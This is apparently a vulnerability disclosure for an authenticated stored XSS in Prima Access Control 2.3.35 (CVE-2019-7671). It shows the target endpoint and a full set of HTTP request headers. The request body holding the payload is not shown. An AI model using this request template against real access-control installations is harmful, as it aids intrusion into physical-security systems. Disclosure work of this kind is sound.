Prima Access Control 2.3.35 Authenticated Stored XSS CVE: CVE-2019-7671 Advisory: https://applied-risk.com/resources/ar-2019-007 Discovered by Gjoko 'LiquidWorm' Krstic POST /bin/sysfcgi.fx HTTP/1.1 Host: 192.168.13.37 Connection: keep-alive Content-Length: 265 Origin: https://192.168.13.37 Session-ID: 10127047 User-Agent: Mozi-Mozi/44.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: text/html, */*; q=0.01 Session-Pc: 2 X-Requested-With: XMLHttpRequest Referer: https://192.168.13.37/app/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9